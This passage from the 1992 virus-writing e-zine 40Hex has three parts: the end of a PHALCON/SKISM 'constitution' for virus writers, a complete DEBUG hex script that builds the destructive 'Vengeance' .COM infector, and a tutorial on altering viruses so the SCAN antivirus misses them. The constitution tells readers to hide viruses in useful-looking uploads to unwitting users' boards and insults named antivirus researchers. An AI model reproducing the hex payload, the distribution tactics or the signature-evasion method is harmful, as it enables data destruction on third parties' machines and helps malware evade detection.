                 taken from any other source, be it a book, a code fragment,
                 or the entire source code from another virus.
                 The term "source virus" herein refers to the virus which
                 spawned the "hacked virus."
            Section B - CODE REQUIREMENTS
                 For a "hacked" virus to conform to the standards set forth
                 by this document, it must include the following, in addition
                 to all the requirements set down in Article I of this
                 document:
                   1) The title, author (if available), and affiliation of
                      the author (if available) of the original virus.
                   2) The author of the hacked virus must give the source
                      code of said virus to the author of the source virus
                      upon demand.
                   3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
                      Avenger hacks are to be written.
                   4) The source virus must be improved in some manner
                      (generally in efficiency of speed or size).
                   5) The hacked virus must significantly differ from the
                      source virus, i.e. it cannot be simply a text change.
            Section C - IMPLEMENTATION
                   1) Credit db 'Source stolen from Avocado by Dark Angel of
                      PHALCON/SKISM',0
  
       ARTICLE III - REGARDING VIRAL STRAINS
            Section A - DEFINITION
                 The term "viral strain" herein refers to any virus written
                 by the original author which does not significantly differ
                 from the original.  It generally implies a shrinking in code
                 size, although this is not required.
            Section B - CODE REQUIREMENTS
                 For a "viral strain" to conform to the standards set by this
                 document, it must include the following, in addition to all
                 the requirements set down in Article I of this document:
                   1) The name of the virus shall be denoted by the name of
                      the original virus followed by a dash and the version
                      letter.
                   2) The name of the virus must not change from that of the
                      original strain.
                   3) A maximum of two strains of the virus can be written.
            Section C - IMPLEMENTATION
                   1) Virus_Name db '[Avocado-B]',0
  
       ARTICLE IV - DISTRIBUTION
            Section A - DEFINITION
                 The term "distribution" herein refers to the transport of
                 the virus through an infected file to the medium of storage
                 of a third (unwitting) party.
            Section B - INFECTION MEDIUM
                 The distributor shall infect a file with the virus before
                 uploading.  Suggested files include:
                   1) Newly released utility programs.
                   2) "Hacked" versions of popular anti-viral software, i.e.
                      the version number should be changed, but little else.
                   3) Beta versions of any program.
                 The infected file, which must actually do something useful,
                 will then be uploaded to a board.  The following boards are
                 fair game:
                   1) PD Boards
                   2) Lamer boards
                   3) Boards where the sysop is a dick
                 No virus shall ever be uploaded, especially by the author,
                 directly to an antivirus board, such as HomeBase or
                 Excalibur.
            Section C - BINARY AND SOURCE CODE AVAILABILITY
                 The binary of the virus shall not be made available until at
                 least two weeks after the initial (illicit) distribution of
                 the virus.  Further, the source code, which need not be made
                 available, cannot be released until the latest version of
                 SCAN detects the virus.  The source code, should it be made
                 available, should be written in English.
            Section D - DOCUMENTATION
                 Documentation can be included with the archive containing
                 the binary of the virus, although this is optional.  The
                 author should include information about the virus suitable
                 for inclusion in the header of VSUM(2).  A simple
                 description will follow, though the author need not reveal
                 any "hidden features" of the virus.  Note this serves two
                 purposes:
                   1) Enable others to effectively spread the virus without
                      fear of self-infection.
                   2) Ensure that your virus gets a proper listing in VSUM.
  
       ARTICLE V - AMENDMENTS
            Section A - PROCEDURE
                 To propose an amendment, you must first contact a
                 PHALCON/SKISM member through one of our member boards.
                 Leave a message to one of us explaining the proposed change.
                 It will then be considered for inclusion.  A new copy of the
                 Constitution will then be drafted and placed on member
                 boards under the filename "PS-CONST.TXT" available for free
                 download by all virus writers.  Additionally, an updated
                 version of the constitution will be published periodically
                 in 40HEX.
            Section B - AMENDMENTS
                 None as of this writing.
  
       ARTICLE VI - MISCELLANEOUS
            Section A - WHO YOU CAN MAKE FUN OF
                 This is a list of people who, over the past few years, have
                 proved themselves to be inept and open to ridicule.
                   1) Ross M. Greenberg, author of FluShot+
                   2) Patricia (What's VSUM?) Hoffman.
                   2) People who post "I am infected by Jerusalem, what do I
                      do?" or "I have 20 virii, let's trade!"
                   3) People who don't know the difference between a virus
                      and a trojan.
                   4) Lamers and "microwares puppies"
            Section B - WHO YOU SHOULDN'T DIS TOO BADLY
                 This is a list of people who, over the past few years, have
                 proved themselves to be somewhat less inept and open to
                 ridicule than most.
                   1) John McAfee, nonauthor of SCAN
                   2) Dennis, true author of SCAN
            Section C - MOTIVATION
                 In most cases, the motivation for writing a virus should not
                 be the pleasure of seeing someone else's system trashed, but
                 to test one's programming abilities.
       
            
                 
                   
  ÄÄÄÄÄÄÄÄÄÄ
  1 SCAN is a registered trademark of McAfee Associates.
  2 VSUM is a registered trademark of that bitch who doesn't know her own
    name.
40Hex Number 5 Volume 2 Issue 1                                      File 006
-------------------------------------------------------------------------------
PHALCON/SKISM Vengeance virus.                            Released  02/03/92
Stats: Non-Resident .COM infector.                        in 40Hex Vmag
       Infects files larger than 1992 bytes
       Size of the virus is about 722 bytes


Note: This Virus is dedicated to the memory of Digital Warfare BBS, which was
      online up until January 20th, 1992.  On that fateful day, the BBS 
      computer was confiscated by local authorities.  Hopefully the board will
      come back up, and be as good as before...

This virus activates the 20th of every month.  Just for the fun of it, I'm not
going to tell you what this thing does upon activation.  I will say one thing -
unless you have suicidal tendencies, DON'T test it on your own machine, OR the
machine of someone you love.  It ain't pretty.  It IS destructive. (286+)  
It IS noisy.  And it IS named appropriately.
  
Text that can be found in the virus:

                         *** Vengeance is ours! ***

                             PHALCON/SKISM '92

As of Scan 86, this virus isn't found.  Since it is based on the Violator virus,
other scanners may find it.  Oh well.  

Have fun with this one, just don't run it on the 20th...  at least, not on 
YOUR machine!  

                         DecimatoR /PHALCON/SKISM 

-------------------------------------------------------------------------------
n veng.com
e 0100  EB 0F 90 90 90 90 90 90 90 90 90 90 90 90 90 90
e 0110  90 51 BA 27 03 FC 8B F2 83 C6 3D BF 00 01 B9 03
e 0120  00 F3 A4 8B F2 B8 0F FF CD 21 3D 01 01 75 03 E9
e 0130  E3 01 06 B4 2F CD 21 89 5C 33 90 8C 44 35 07 BA
e 0140  92 00 90 03 D6 B4 1A CD 21 90 06 56 8E 06 2C 00
e 0150  BF 00 00 5E 56 83 C6 43 AC B9 00 80 F2 AE B9 04
e 0160  00 AC AE 75 EE E2 FA 5E 07 89 7C 4E 8B FE 83 C7
e 0170  52 8B DE 83 C6 52 8B FE EB 3D 83 7C 4E 00 75 03
e 0180  E9 3F 01 1E 56 26 8E 1E 2C 00 90 8B FE 90 26 8B
e 0190  75 4E 90 83 C7 52 90 90 AC 90 3C 3B 90 74 0B 90
e 01A0  3C 00 74 03 AA EB F0 BE 00 00 5B 1F 89 77 4E 80
e 01B0  FD 5C 74 03 B0 5C AA 89 7F 50 8B F3 83 C6 48 B9
e 01C0  06 00 F3 A4 8B F3 B4 4E BA 52 00 03 D6 B9 03 00
e 01D0  CD 21 EB 04 B4 4F CD 21 73 02 EB 9E 8B 84 A8 00
e 01E0  24 1C 3C 1C 74 EE 81 BC AC 00 2D F7 77 E6 81 BC
e 01F0  AC 00 C8 07 72 DE 8B 7C 50 56 81 C6 B0 00 AC AA
e 0200  3C 00 75 FA 5E B8 00 43 BA 52 00 03 D6 CD 21 89
e 0210  4C 3B B8 01 43 83 E1 FE BA 52 00 03 D6 CD 21 B8
e 0220  02 3D BA 52 00 03 D6 CD 21 73 03 E9 87 00 8B D8
e 0230  B8 00 57 CD 21 89 4C 37 89 54 39 B4 2C CD 21 B4
e 0240  3F B9 03 00 BA 3D 00 03 D6 CD 21 72 53 3D 03 00
e 0250  75 4E B8 02 42 B9 00 00 BA 00 00 CD 21 72 41 8B
e 0260  C8 2D 03 00 89 44 41 81 C1 16 03 8B FE 81 EF 14
e 0270  02 89 0D B4 40 B9 D3 02 8B D6 81 EA 16 02 CD 21
e 0280  72 1E 3D D3 02 75 19 B8 00 42 B9 00 00 BA 00 00
e 0290  CD 21 72 0C B4 40 B9 03 00 8B D6 83 C2 40 CD 21
e 02A0  8B 54 39 8B 4C 37 83 E1 E0 83 C9 1C B8 01 57 CD
e 02B0  21 B4 3E CD 21 B8 01 43 8B 4C 3B BA 52 00 03 D6
e 02C0  CD 21 1E B4 1A 8B 54 33 8E 5C 35 CD 21 1F B4 2A
e 02D0  CD 21 80 FA 14 75 3E B4 09 8B D6 83 C2 00 CD 21
e 02E0  BA 80 00 32 ED B4 05 CD 13 80 FE 01 74 04 FE C6
e 02F0  EB F3 80 FD 20 74 06 32 F6 FE C5 EB E8 80 FA 81
e 0300  74 06 B2 81 32 F6 EB DB B8 09 25 CD 21 B4 02 B2
e 0310  07 CD 21 EB F8 59 33 C0 33 DB 33 D2 33 F6 BF 00
e 0320  01 57 33 FF C2 FF FF 0D 0A 2A 2A 2A 20 56 65 6E
e 0330  67 65 61 6E 63 65 20 69 73 20 6F 75 72 73 21 20
e 0340  2A 2A 2A 0D 0A 24 20 53 4B 49 53 4D 2F 50 68 61
e 0350  6C 63 6F 6E 20 27 39 32 20 24 00 00 00 00 00 00
e 0360  00 00 00 00 CD 20 90 E9 00 00 50 41 54 48 3D 2A
e 0370  2E 43 4F 4D 00 00 00 00 00 00 00 00 00 00 00 00
e 0380  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0  00 00 00 00 
rcx
03E3
w
q
-------------------------------------------------------------------------------

40Hex Number 5 Volume 2 Issue 1                                      File 007

                HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT
                                PART II
  
  
  In Issue 1 of 40Hex, Hellraiser presented a simple (though incredibly
  tedious) method of searching for scan strings.  In short, this was his
  method:
  
    1) Make a small carrier file.
    2) Infect the carrier with the virus.
    3) Fill parts of the virus with a dummy value until you isolate the
       scan string.
    4) Modify the virus so it is not detectable, i.e. switch the order of
       the instructions.
  
  The problem is, of course, that step 3 takes a maddeningly inordinate
  amount of time.  I shall present a tip which will save you much time.
  The trick is, of course, to find out where the encryption mechanism and
  hence the unencrypted portion where the scan string is usually located.
  Once the encryption mechanism is located, isolating the scan string is
  much simpler.
  
  Of course, the problem is finding the encryption mechanism in the first
  place.  The simplest method of doing this is using V Communication's
  Sourcer 486, or any similar dissassembler.  Dissassemble the file and
  search for the unencrypted portions.  Most of the file will be DBs, so
  search for any part which isn't.  Once you have located those parts, all
  you have to do is subtract 100h from the memory location to find its
  physical offset in the file.  You now have a general idea of where the
  scan string is located, so perform step 3 until you find it.
  
  Ack, you say, what if you don't have Sourcer?  Well, all is not lost.
  Load up the infected carrier in good old DEBUG.  The first instruction
  (in COM infections) should be a JMP.  Trace (T) into the JMP and you
  should be thrown into the area around the encryption mechanism.  Use the
  memory offset (relative to the PSP segment) and subtract 100h to find
  the physical location of the unencrypted portion in the file.  Once
  again, once you have this, perform step 3.  Simple, no?

  Sometimes, SCAN looks for the writing portion of the code, which
  generally calls INT 21h, function 40h.  This is usually, though not
  always, located somewhere near the encryption mechanism.  If it is
  not near there, all you have to do is trace through the virus until
  it calls the write file function.

  Another method of looking for scan codes is to break the infected carrier
  file into a series of 50 byte overlapping chunks.  For example, the first
  chunk would be from offset 0 to 49, the second from 24 to 74, the third
  from 49 to 99, etc.  Then use SCAN to see which chunk holds the scan code.
  This is by far the easiest, not to mention quickest, method.
  
  One side note on step 1, making the carrier file.  Some virii don't
  infect tiny files.  What you must do is create a larger file (duh).
  Simply assemble the following two lines:
  
      int 20h
      db  98 dup (0)
  
  (with all the garbage segment declarations and shit, of course) and
  you'll have a nice 100 byte carrier which should be sufficient in most
  cases, with maybe the exception of the Darth Vaders.
  
  Enjoy!
-------------------------------------------------------------------------------
                                                                     Dark Angel